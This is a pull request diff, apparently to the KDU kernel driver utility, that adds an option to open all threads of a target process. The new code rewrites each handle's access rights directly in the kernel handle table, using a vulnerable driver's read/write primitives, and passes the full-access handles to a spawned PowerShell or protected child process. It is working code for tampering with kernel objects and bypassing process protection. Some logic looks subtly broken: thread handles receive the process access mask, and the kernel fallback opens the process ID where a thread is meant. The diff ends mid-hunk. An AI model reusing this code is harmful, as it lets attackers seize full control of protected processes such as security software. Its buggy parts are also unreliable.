### PR TITLE
Open any process and its threads - inherit the full access handles

### DIFF
--- a/README.md
+++ b/README.md
@@ -39,6 +39,7 @@ It features:
 * -pse  - launch program as ProtectedProcessLight-AntiMalware (PPL);
 * -psw  - launch program as ProtectedProcessLight-WinTcb (PPL);
 * -pho  - open an arbitrary process with full access
+  * -pht - also open all threads in this process with full access
   * -phc - commandline (child process) to inherit the flag, default powershell
   * -phe - also start the child process as ppl
 * -dmp  - dump virtual memory of the given process;
@@ -60,7 +61,7 @@ Example:
 + kdu -dse 6
 + kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt"
 + kdu -psw "C:\Windows\System32\cmd.exe"
-+ kdu -pho 1234 -phe 3
++ kdu -pho 1234 -pht -phe 3
 + kdu -listcsv "c:\kdu\out.csv"
 
 Run on Windows 11 24H2*

--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -754,18 +754,9 @@ BOOL KDUProviderVerifyActionType(
     switch (ActionType) {
 
     case ActionTypeOpenProcessHandle:
-
-        if (Provider->Callbacks.OpenProcess == NULL)
-        {
-            supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary process handle acquisition or\r\n"\
-                "\tKDU interface is not implemented for this method.\r\n");
-            return FALSE;
-
-        }
-
         break; 
-        // in case the access rights need to be modified, -pho also needs to have read/write
-        // but I guess it's better to fail when r/w is required later, then to fail here when r/w would maybe not be required
+		// the OpenProcess action may need Callbacks.OpenProcess, Callbacks.ReadKernelVM && Callbacks.WriteKernelVM, neither, or both
+		// this depends on the protection and context when running KDU, so only check on runtime, skip here (do not forget to check on runtime!)
 
     case ActionTypeDKOM:
     case ActionTypeMapDriver:

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -167,11 +167,11 @@ INT KDUProcessPMObjectSwitch(
 }
 
 /*
-* KDUDuplicateProcessHandleSwitch
+* KDUOpenProcessInheritHandle
 *
 * Purpose:
 *
-* Handle -dph switch.
+* Handle -pho switch.
 *
 */
 INT KDUOpenProcessInheritHandle(

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -29,6 +29,7 @@
 #define CMD_PM1         L"-pm1"
 #define CMD_PM2         L"-pm2"
 #define CMD_PHO         L"-pho"
+#define CMD_PHT         L"-pht"
 #define CMD_PHC         L"-phc"
 #define CMD_PHE         L"-phe"
 #define CMD_DMP         L"-dmp"
@@ -57,6 +58,7 @@
                      "kdu -pm1 pid        - Overwrites Process MitigationsFlags1 with 0x0 for given pid\r\n"\
                      "kdu -pm2 pid        - Overwrites Process MitigationsFlags2 with 0x0 for given pid\r\n"\
                      "kdu -pho pid        - Open a Process Handle to the given pid, patches the handle to full access in case of stripping, sets inherit to true and starts a child process, powershell default\r\n"\
+                     "kdu -pht            - Also open all threads in the given pid, patches the handles to with full access, only with pho\r\n"\
                      "kdu -phc cmdline    - The command line of the new child process that inherits the full access process handle, only with pho\r\n"\
                      "kdu -phe ppllevel   - The ppl level of the new child process, (none) 0-6 (max), only with pho\r\n"\
                      "kdu -dse value      - Write user defined value to the system DSE state flags\r\n"\
@@ -177,6 +179,7 @@ INT KDUOpenProcessInheritHandle(
     _In_ ULONG NtBuildNumber,
     _In_ ULONG ProviderId,
     _In_ ULONG_PTR TargetProcessId,
+    _In_ BOOL OpenThreads,
     _In_ ULONG_PTR PPLLevel,
     _In_ LPWSTR CommandLine
 )
@@ -192,7 +195,7 @@ INT KDUOpenProcessInheritHandle(
         ActionTypeOpenProcessHandle);
 
     if (provContext) {
-        bResult = KDURunCommandInheritee(provContext, CommandLine, TargetProcessId, PPLLevel);
+        bResult = KDURunCommandInheritee(provContext, CommandLine, TargetProcessId, OpenThreads, PPLLevel);
         KDUProviderRelease(provContext);
     }
 
@@ -726,6 +729,16 @@ INT KDUProcessCommandLine(
                     _strcpy(szCmdLine, L"powershell.exe"); // default command line
 
                     ULONG_PTR level = 0;
+					BOOL openThreads = FALSE;
+
+                    if (supGetCommandLineOption(CMD_PHT,
+                        FALSE,
+                        NULL,
+                        0,
+                        NULL))
+                    {
+                        openThreads = TRUE;
+                    }
 
                     if (supGetCommandLineOption(CMD_PHC,
                         TRUE,
@@ -754,6 +767,7 @@ INT KDUProcessCommandLine(
                         NtBuildNumber,
                         providerId,
                         processId,
+                        openThreads,
                         level,
                         szCmdLine);
                 }

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -19,7 +19,6 @@
 
 #include "global.h"
 #include <TlHelp32.h>
-#include <vector>
 #include <Dbghelp.h>
 
 typedef BOOL(WINAPI* pfnMiniDumpWriteDump)(
@@ -1017,7 +1016,9 @@ BOOL KDURunCommandInheritee(
 	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
 	if (OpenThreads) {
 		printf("[+] Opening all threads of target process %llu, set inheritable and THREAD_ALL_ACCESS...\n", TargetProcessId);
-		std::vector<HANDLE> threadHandles;
+		
+        HANDLE threadHandles[MAX_THREADS]; // arbitrary limit
+        size_t threadCount = 0;
 
 		HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
 		if (hThreadSnap == INVALID_HANDLE_VALUE) {
@@ -1054,8 +1055,14 @@ BOOL KDURunCommandInheritee(
 						printf("[!] Failed to open thread with TID %lu. Error: %lu\n", te32.th32ThreadID, GetLastError());
 						continue;
 					}
+                    
+                    if (threadCount >= MAX_THREADS) {
+                        printf_s("[-] Warning: Reached MAX_THREADS (%u), continuing to patching...\n", MAX_THREADS);
+                        CloseHandle(hThread);
+                        break;
+                    }
 
-					threadHandles.push_back(hThread);
+					threadHandles[threadCount++] = hThread;
 				}
 			} while (Thread32Next(hThreadSnap, &te32));
             CloseHandle(hThreadSnap);
@@ -1068,7 +1075,8 @@ BOOL KDURunCommandInheritee(
 
         // check if the thread handles have THREAD_ALL_ACCESS rights, if not, patch it
         int err = 0;
-        for (auto& hThread : threadHandles) {
+        for (size_t i = 0; i < threadCount; i++) {
+            HANDLE hThread = threadHandles[i];
             if (KDUSetHandleInheritable(hThread)) {
                 if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
 					printf("[+] Thread handle %p set to THREAD_ALL_ACCESS and inheritable.\n", hThread);
@@ -1084,7 +1092,7 @@ BOOL KDURunCommandInheritee(
             }
         }
         if (err > 0) {
-            printf("[-] Continuing despite having %i incomplete threads out of %llu thread(s).\n", err, threadHandles.size());
+            printf("[-] Continuing despite having %i incomplete threads out of %llu thread(s).\n", err, threadCount);
         }
 	}
 

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -18,7 +18,6 @@
 *******************************************************************************/
 
 #include "global.h"
-#include <TlHelp32.h>
 #include <Dbghelp.h>
 
 typedef BOOL(WINAPI* pfnMiniDumpWriteDump)(
@@ -962,6 +961,117 @@ BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK access
     }
 }
 
+BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
+    ULONG bufferSize = 0x10000;
+    PVOID buffer = NULL;
+    NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
+
+    // dynamically allocate and fetch system process/thread information
+    do {
+        buffer = malloc(bufferSize);
+        if (!buffer) {
+            supPrintfEvent(kduEventError, 
+                "[!] Out of memory allocating system info buffer.\n");
+            return FALSE;
+        }
+
+        status = NtQuerySystemInformation(SystemProcessInformation, buffer, bufferSize, &bufferSize);
+
+        if (status == STATUS_INFO_LENGTH_MISMATCH) {
+            free(buffer);
+            bufferSize *= 2; // double it and give it to the next loop
+        }
+        else if (status != STATUS_SUCCESS) {
+            free(buffer);
+            supPrintfEvent(kduEventError, 
+                "[!] NtQuerySystemInformation failed. Status: 0x%08X\n", status);
+            return FALSE;
+        }
+    } while (status == STATUS_INFO_LENGTH_MISMATCH);
+
+    // traverse the system information structures to find TargetProcessId
+    PSYSTEM_PROCESS_INFORMATION pCurrentProcess = (PSYSTEM_PROCESS_INFORMATION)buffer;
+    int threadCount = 0;
+    int err = 0;
+
+    while (TRUE) {
+        // check if this entry matches the target process
+        if ((ULONG_PTR)pCurrentProcess->UniqueProcessId == TargetProcessId) {
+            printf_s("[+] Found target process %llu, traversing its %lu threads...\n", TargetProcessId, pCurrentProcess->ThreadCount);
+
+            // iterate through all threads of this process, open and patch them
+            for (ULONG i = 0; i < pCurrentProcess->ThreadCount; i++) {
+                SYSTEM_THREAD_INFORMATION threadInfo = pCurrentProcess->Threads[i];
+                DWORD_PTR targetTid = (DWORD_PTR)threadInfo.ClientId.UniqueThread;
+
+                HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, (DWORD)targetTid);
+                if (hThread == NULL) {
+                    // first fallback: Query limited info
+                    hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, (DWORD)targetTid);
+
+                    if (hThread == NULL) {
+                        printf_s("[-] Target process %llu cannot be opened via user-mode, fallback to KDUOpenProcess()\r\n", TargetProcessId);
+
+                        // second fallback: KDU Kernel-mode open (and hope the primitive does not break on threads)
+                        if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
+                            printf_s("[-] Warning: Selected provider does not support arbitrary thread handle acquisition, skipping thread %lu.\r\n", (DWORD)targetTid);
+                            continue;
+                        }
+                        if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, THREAD_ALL_ACCESS, &hThread)) {
+                            printf_s("[-] Warning: Failed to open thread %lu via user- and kernel-mode, skipping.\n", (DWORD)targetTid);
+                            continue;
+                        }
+                    }
+                }
+
+                if (hThread == NULL) {
+                    printf_s("[!] Failed to open thread with TID %lu. Error: %lu\n", (DWORD)targetTid, GetLastError());
+                    continue;
+                }
+
+                // finally patch the found thread
+                threadCount++;
+
+                if (KDUSetHandleInheritable(hThread)) {
+                    if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
+                        printf_s("[+] Thread handle %p (TID: %lu) set to THREAD_ALL_ACCESS and inheritable.\n", hThread, (DWORD)targetTid);
+                    }
+                    else {
+                        printf_s("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\n", hThread);
+                        err++;
+                    }
+                }
+                else {
+                    printf_s("[!] Failed to set thread handle %p as inheritable.\n", hThread);
+                    err++;
+                }
+            }
+
+            // target process found and processed, returning from the function
+            free(buffer);
+            if (err > 0) {
+                printf_s("[-] Warning: Continuing despite having %i erroneous thread handle(s) out of %i in %llu.\n", err, threadCount, TargetProcessId);
+            }
+            else {
+                printf_s("[+] Success: Opened and patched all %i thread handle(s) in %llu.\n", threadCount, TargetProcessId);
+            }
+            return TRUE;
+        }
+
+        // move to the next process entry or exit if it's the last one
+        if (pCurrentProcess->NextEntryDelta == 0) {
+            break;
+        }
+        pCurrentProcess = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)pCurrentProcess + pCurrentProcess->NextEntryDelta);
+    }
+
+    // target process not found -> return FALSE
+    free(buffer);
+    supPrintfEvent(kduEventError,
+        "[!] Target process %llu not found to open and patch threads.\n", TargetProcessId);
+    return FALSE;
+}
+
 /*
 * KDURunCommandInheritee
 *
@@ -1022,89 +1132,13 @@ BOOL KDURunCommandInheritee(
 	}
 
 	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
-	if (OpenThreads) {
-		printf_s("[+] Opening all threads of target process %llu, set inheritable and THREAD_ALL_ACCESS...\n", TargetProcessId);
-		
-        HANDLE threadHandles[MAX_THREADS]; // arbitrary limit
-        size_t threadCount = 0;
+    if (OpenThreads) {
+        printf_s("[+] Opening all threads of target process %llu...\n", TargetProcessId);
 
-		HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
-		if (hThreadSnap == INVALID_HANDLE_VALUE) {
-			supPrintfEvent(kduEventError, 
-                "[!] Failed to create thread snapshot. Error: %lu\n", GetLastError());
-			return FALSE;
-		}
-		THREADENTRY32 te32;
-		te32.dwSize = sizeof(THREADENTRY32);
-		if (Thread32First(hThreadSnap, &te32)) {
-			do {
-				if (te32.th32OwnerProcessID == TargetProcessId) {
-					
-                    HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
-                    if (hThread == NULL) {
-                        
-                        // fallback, should work for most
-						hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, te32.th32ThreadID);
-
-                        if (hThread == NULL) {
-                            printf_s("[-] Target process %llu cannot be opened via user-mode, fallback to KDUOpenProcess()\r\n", TargetProcessId);
-
-							// 2nd fallback also using KDU OpenProcess
-							if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) { // ignore a thread if the provider does not support arbitrary process handle acquisition
-                                printf_s("[-] Warning: Selected provider does not support arbitrary thread handle acquisition, not inheriting thread %lu.\r\n", te32.th32ThreadID);
-                                continue;
-                            }
-                            if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, THREAD_ALL_ACCESS, &hThread)) {
-                                printf_s("[-] Warning: Failed to open thread %lu via user- and kernel-mode, not inheriting it.", te32.th32ThreadID);
-                                continue;
-                            }
-                        }
-                    }
-					if (hThread == NULL) {
-						printf_s("[!] Failed to open thread with TID %lu. Error: %lu\n", te32.th32ThreadID, GetLastError());
-						continue;
-					}
-                    
-                    if (threadCount >= MAX_THREADS) {
-                        printf_s("[-] Warning: Reached MAX_THREADS (%u), continuing to patching...\n", MAX_THREADS);
-                        CloseHandle(hThread);
-                        break;
-                    }
-
-					threadHandles[threadCount++] = hThread;
-				}
-			} while (Thread32Next(hThreadSnap, &te32));
-            CloseHandle(hThreadSnap);
-		}
-		else {
-			supPrintfEvent(kduEventError, 
-                "[!] Invalid thread snapshot. Error: %lu\n", GetLastError());
-			CloseHandle(hThreadSnap);
-			return FALSE;
-		}
-
-        // check if the thread handles have THREAD_ALL_ACCESS rights, if not, patch it
-        int err = 0;
-        for (size_t i = 0; i < threadCount; i++) {
-            HANDLE hThread = threadHandles[i];
-            if (KDUSetHandleInheritable(hThread)) {
-                if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
-					printf_s("[+] Thread handle %p set to THREAD_ALL_ACCESS and inheritable.\n", hThread);
-				}
-				else {
-				    printf_s("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\n", hThread);
-					err++;
-				}
-            }
-            else {
-				printf_s("[!] Failed to set thread handle %p as inheritable.\n", hThread);
-                err++;
-            }
+        if (!KDUOpenAndPatchThreads(Context, TargetProcessId)) {
+            printf_s("[!] Continuing despite not being able to open and patch threads...\n");
         }
-        if (err > 0) {
-            printf_s("[-] Warning: Continuing despite having %i erroneous thread handle(s) out of %llu.\n", err, threadCount);
-        }
-	}
+    }
 
     STARTUPINFO si;
     PROCESS_INFORMATION pi;

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -705,9 +705,9 @@ BOOL KDUControlProcessMitigationFlags(
 
 ULONG_PTR LookupHandleEntry(
     _In_ PKDU_CONTEXT Context,
-    ULONG_PTR HandleTable,
-    HANDLE HandleValue,
-	KDU_EPROCESS_OFFSETS offsets
+    _In_ ULONG_PTR HandleTable,
+    _In_ HANDLE HandleValue,
+    _In_ KDU_EPROCESS_OFFSETS offsets
 )
 {
     ULONG_PTR TableCode;
@@ -793,13 +793,14 @@ BOOL KDUControlHandleAccess(
     _In_ PKDU_CONTEXT Context,
     _In_ ULONG_PTR ProcessId,
     _In_ HANDLE HandleValue,
-    _In_ ACCESS_MASK NewAccessMask)
+    _In_ ACCESS_MASK NewAccessMask,
+    _Inout_opt_ ULONG_PTR* ProcessHandleTable) // save process handle table for next handle manipulation
 {
-	BOOL       bResult = FALSE;
+	BOOL       bResult = FALSE, bReusedTable = FALSE;
 	NTSTATUS   ntStatus;
 	ULONG_PTR  ProcessObject = 0, HandleTable = 0, HandleEntry = 0;
 	HANDLE     hProcess = NULL;
-	CLIENT_ID clientId;
+	CLIENT_ID  clientId;
 	OBJECT_ATTRIBUTES obja;
 	KDU_EPROCESS_OFFSETS offsets;
 	
@@ -821,122 +822,147 @@ BOOL KDUControlHandleAccess(
 	InitializeObjectAttributes(&obja, NULL, 0, 0, 0);
 	clientId.UniqueProcess = (HANDLE)ProcessId;
 	clientId.UniqueThread = NULL;
-	
-    ntStatus = NtOpenProcess(&hProcess, PROCESS_QUERY_LIMITED_INFORMATION,
-		&obja, &clientId);
-	
-    if (NT_SUCCESS(ntStatus)) {
-		printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
-		bResult = supQueryObjectFromHandle(hProcess, &ProcessObject);
-		
-        if (bResult && (ProcessObject != 0)) {
-			printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
-			
-            // read the ObjectTable pointer from the EPROCESS structure
-			if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
-				EPROCESS_TO_OBJECTTABLE(ProcessObject, offsets.ObjectTableOffset),
-				&HandleTable,
-				sizeof(ULONG_PTR))) 
+
+    // check if previous HandleTable can be user
+    if (ProcessHandleTable != nullptr && *ProcessHandleTable != 0) {
+        HandleTable = *ProcessHandleTable; // reusing table
+        bReusedTable = TRUE;
+    }
+    else { // HandleTable of current process must be retrieved
+        ntStatus = NtOpenProcess(&hProcess, PROCESS_QUERY_LIMITED_INFORMATION,
+            &obja, &clientId);
+
+        if (NT_SUCCESS(ntStatus)) {
+            printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
+            bResult = supQueryObjectFromHandle(hProcess, &ProcessObject);
+
+            if (bResult && (ProcessObject != 0)) {
+                printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
+
+                // read the ObjectTable pointer from the EPROCESS structure
+                if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+                    EPROCESS_TO_OBJECTTABLE(ProcessObject, offsets.ObjectTableOffset),
+                    &HandleTable,
+                    sizeof(ULONG_PTR)))
+                {
+                    printf_s("[+] ObjectTable pointer read: 0x%llX", HandleTable);
+                    if (ProcessHandleTable != nullptr) {
+                        *ProcessHandleTable = HandleTable; // save HandleTable for next call
+                        printf_s(" and saved for next call");
+                    }
+                    printf_s("\r\n");
+                }
+                else {
+                    supPrintfEvent(kduEventError,
+                        "[!] Cannot read ObjectTable pointer\r\n");
+                }
+            }
+            else {
+                supPrintfEvent(kduEventError,
+                    "[!] Cannot query process object\r\n");
+            }
+            NtClose(hProcess);
+        }
+        else {
+            supShowHardError("[!] Cannot open target process", ntStatus);
+        }
+    }
+
+    // check if the HandleTable was found
+    if (HandleTable != 0) {
+
+        // parse the layer type
+        HandleEntry = LookupHandleEntry(Context, HandleTable, HandleValue, offsets);
+        if (HandleEntry != 0) {
+            printf_s("[+] HandleEntry pointer read: 0x%llX", HandleEntry);
+            if (bReusedTable) {
+                printf_s(" via cached ObjectTable 0x%llX", HandleTable);
+            }
+            printf_s("\r\n");
+
+            // read the current access rights from the HandleTableEntry
+            HANDLE_TABLE_ENTRY entry = { 0 };
+            if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+                HandleEntry,
+                &entry,
+                sizeof(entry)))
             {
-				printf_s("[+] ObjectTable pointer read: 0x%llX\r\n", HandleTable);
+                printf_s("[+] Current Handle access rights: 0x%lX\r\n", entry.GrantedAccess);
 
-                // parse the layer type
-				HandleEntry = LookupHandleEntry(Context, HandleTable, HandleValue, offsets);
-				if (HandleEntry != 0) {
-				    printf_s("[+] HandleEntry pointer read: 0x%llX\r\n", HandleEntry);
+                // modify the access rights
+                bResult = Context->Provider->Callbacks.WriteKernelVM(
+                    Context->DeviceHandle,
+                    HandleEntry + offsetof(HANDLE_TABLE_ENTRY, GrantedAccess),
+                    &NewAccessMask,
+                    sizeof(ULONG)
+                );
 
-				    // read the current access rights from the HandleTableEntry
-				    HANDLE_TABLE_ENTRY entry = { 0 };
+                if (bResult) { // and verify
+                    printf_s("[+] Handle access rights modified successfully.\r\n");
                     if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
                         HandleEntry,
                         &entry,
                         sizeof(entry)))
                     {
-                        printf_s("[+] Current Handle access rights: 0x%lX\r\n", entry.GrantedAccess);
-
-                        // modify the access rights
-                        bResult = Context->Provider->Callbacks.WriteKernelVM(
-                            Context->DeviceHandle,
-                            HandleEntry + offsetof(HANDLE_TABLE_ENTRY, GrantedAccess),
-                            &NewAccessMask,
-                            sizeof(ULONG)
-                        );
-
-                        if (bResult) { // and verify
-                            printf_s("[+] Handle access rights modified successfully.\r\n");
-                            if (Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
-                                HandleEntry,
-                                &entry,
-                                sizeof(entry)))
-                            {
-                                if ((entry.GrantedAccess & NewAccessMask) == NewAccessMask) {
-                                    printf_s("[+] Verified: Handle access rights updated to 0x%lX.\r\n", entry.GrantedAccess);
-                                }
-                                else {
-                                    bResult = FALSE; // 
-                                    supPrintfEvent(kduEventError, 
-                                        "[!] Verification failed: Handle access rights are 0x%lX, expected 0x%lX.\r\n", entry.GrantedAccess, NewAccessMask);
-                                }
-                            }
-                            else {
-                                printf_s("[!] Warning: Failed to read back HandleTableEntry after modification, continuing...\r\n");
-                            }
+                        if ((entry.GrantedAccess & NewAccessMask) == NewAccessMask) {
+                            printf_s("[+] Verified: Handle access rights updated to 0x%lX.\r\n", entry.GrantedAccess);
                         }
                         else {
-                            supPrintfEvent(kduEventError, 
-                                "[!] Failed to modify handle access rights\r\n");
+                            bResult = FALSE; // reset to false
+                            supPrintfEvent(kduEventError,
+                                "[!] Verification failed: Handle access rights are 0x%lX, expected 0x%lX.\r\n", entry.GrantedAccess, NewAccessMask);
                         }
                     }
                     else {
-						supPrintfEvent(kduEventError, 
-                            "[!] Cannot read HandleTableEntry\r\n");
+                        printf_s("[!] Warning: Failed to read back HandleTableEntry after modification, continuing...\r\n");
                     }
-				}
-				else {
-					supPrintfEvent(kduEventError, 
-                        "[!] Cannot read HandleTableEntry\r\n");
-				}
-			}
-			else {
-				supPrintfEvent(kduEventError,
-					"[!] Cannot read ObjectTable pointer\r\n");
-			}
-		}
-		else {
-			supPrintfEvent(kduEventError,
-				"[!] Cannot query process object\r\n");
-		}
-		NtClose(hProcess);
-	}
-	else {
-		supShowHardError("[!] Cannot open target process", ntStatus);
-	}
+                }
+                else {
+                    supPrintfEvent(kduEventError,
+                        "[!] Failed to modify handle access rights\r\n");
+                }
+            }
+            else {
+                supPrintfEvent(kduEventError,
+                    "[!] Cannot read HandleTableEntry\r\n");
+            }
+        }
+        else {
+            supPrintfEvent(kduEventError,
+                "[!] Cannot read HandleTableEntry\r\n");
+        }
+    }
 
 	FUNCTION_LEAVE_MSG(__FUNCTION__);
 
 	return bResult;
 }
 
-BOOL KDUSetHandleInheritable(HANDLE hHandle)
+BOOL KDUSetHandleInheritable(
+    _In_ HANDLE hHandle)
 {
 	DWORD flags = 0;
 	if (!GetHandleInformation(hHandle, &flags)) {
-		printf_s("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
+		printf_s("[!] GetHandleInformation failed. Error: %lu\r\n", GetLastError());
 		return FALSE; // safe exit instead of undefined continuation
 	}
 	if (flags & HANDLE_FLAG_INHERIT) { // already inheritable
-        printf_s("[+] Ok: The handle %p is already inheritable.\n", hHandle);
+        printf_s("[+] Ok: The handle %p is already inheritable.\r\n", hHandle);
         return TRUE;
     }
 	if (!SetHandleInformation(hHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
 		printf_s("[!] SetHandleInformation failed. Error: %lu\n", GetLastError());
 		return FALSE;
 	}
-	printf_s("[+] Success: Set HANDLE_FLAG_INHERIT on the handle %p.\n", hHandle);
+	printf_s("[+] Success: Set HANDLE_FLAG_INHERIT on the handle %p.\r\n", hHandle);
 	return TRUE;
 }
 
-BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK accessMask)
+BOOL KDUSetAccessRights(
+    _In_ PKDU_CONTEXT Context,
+    _In_ HANDLE hHandle,
+    _In_ ACCESS_MASK accessMask,
+    _Inout_opt_ ULONG_PTR* ProcessHandleTable)
 {
     unsigned char buf[sizeof(OBJECT_BASIC_INFORMATION)] = {};
     ULONG returnLength;
@@ -945,23 +971,27 @@ BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK access
     if (status == STATUS_SUCCESS) {
         POBJECT_BASIC_INFORMATION pBasicInfo = (POBJECT_BASIC_INFORMATION)buf;
         if ((pBasicInfo->GrantedAccess & accessMask) == accessMask) {
-            printf_s("[+] Ok: The handle %p already has the required rights 0x%lX to the target process.\n", hHandle, accessMask);
+            printf_s("[+] Ok: The handle %p already has the required rights 0x%lX to the target process.\r\n", hHandle, accessMask);
             return TRUE;
         }
         else {
-            printf_s("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hHandle, pBasicInfo->GrantedAccess);
+            printf_s("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\r\n", hHandle, pBasicInfo->GrantedAccess);
 
             // attempt to modify the handle's access rights using KDUControlHandleAccess
-            return KDUControlHandleAccess(Context, GetCurrentProcessId(), hHandle, PROCESS_ALL_ACCESS);
+            return KDUControlHandleAccess(Context, GetCurrentProcessId(), hHandle, PROCESS_ALL_ACCESS, ProcessHandleTable);
         }
     }
     else {
-        printf_s("[!] Failed to query handle information with status: 0x%lX\n", status);
+        printf_s("[!] Failed to query handle information with status: 0x%lX\r\n", status);
         return FALSE;
     }
 }
 
-BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
+BOOL KDUOpenAndPatchThreads(
+    _In_ KDU_CONTEXT* Context,
+    _In_ ULONG_PTR TargetProcessId,
+    _Inout_opt_ ULONG_PTR* ProcessHandleTable)
+{
     ULONG bufferSize = 0x10000;
     PVOID buffer = NULL;
     NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
@@ -971,7 +1001,7 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
         buffer = malloc(bufferSize);
         if (!buffer) {
             supPrintfEvent(kduEventError, 
-                "[!] Out of memory allocating system info buffer.\n");
+                "[!] Out of memory allocating system info buffer.\r\n");
             return FALSE;
         }
 
@@ -984,7 +1014,7 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
         else if (status != STATUS_SUCCESS) {
             free(buffer);
             supPrintfEvent(kduEventError, 
-                "[!] NtQuerySystemInformation failed. Status: 0x%08X\n", status);
+                "[!] NtQuerySystemInformation failed. Status: 0x%08X\r\n", status);
             return FALSE;
         }
     } while (status == STATUS_INFO_LENGTH_MISMATCH);
@@ -997,7 +1027,7 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
     while (TRUE) {
         // check if this entry matches the target process
         if ((ULONG_PTR)pCurrentProcess->UniqueProcessId == TargetProcessId) {
-            printf_s("[+] Found target process %llu, traversing its %lu threads...\n", TargetProcessId, pCurrentProcess->ThreadCount);
+            printf_s("[+] Found target process %llu, traversing its %lu threads...\r\n", TargetProcessId, pCurrentProcess->ThreadCount);
 
             // iterate through all threads of this process, open and patch them
             for (ULONG i = 0; i < pCurrentProcess->ThreadCount; i++) {
@@ -1010,7 +1040,7 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
                     hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, (DWORD)targetTid);
 
                     if (hThread == NULL) {
-                        printf_s("[-] Target process %llu cannot be opened via user-mode, fallback to KDUOpenProcess()\r\n", TargetProcessId);
+                        printf_s("[-] Target thread %llu cannot be opened via user-mode, fallback to KDUOpenProcess()\r\n", TargetProcessId);
 
                         // second fallback: KDU Kernel-mode open (and hope the primitive does not break on threads)
                         if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
@@ -1018,14 +1048,14 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
                             continue;
                         }
                         if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, THREAD_ALL_ACCESS, &hThread)) {
-                            printf_s("[-] Warning: Failed to open thread %lu via user- and kernel-mode, skipping.\n", (DWORD)targetTid);
+                            printf_s("[-] Warning: Failed to open thread %lu via user- and kernel-mode, skipping.\r\n", (DWORD)targetTid);
                             continue;
                         }
                     }
                 }
 
                 if (hThread == NULL) {
-                    printf_s("[!] Failed to open thread with TID %lu. Error: %lu\n", (DWORD)targetTid, GetLastError());
+                    printf_s("[!] Failed to open thread with TID %lu. Error: %lu\r\n", (DWORD)targetTid, GetLastError());
                     continue;
                 }
 
@@ -1033,16 +1063,16 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
                 threadCount++;
 
                 if (KDUSetHandleInheritable(hThread)) {
-                    if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
-                        printf_s("[+] Thread handle %p (TID: %lu) set to THREAD_ALL_ACCESS and inheritable.\n", hThread, (DWORD)targetTid);
+                    if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS, ProcessHandleTable)) {
+                        printf_s("[+] Thread handle %p (TID: %lu) set to THREAD_ALL_ACCESS and inheritable.\r\n", hThread, (DWORD)targetTid);
                     }
                     else {
-                        printf_s("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\n", hThread);
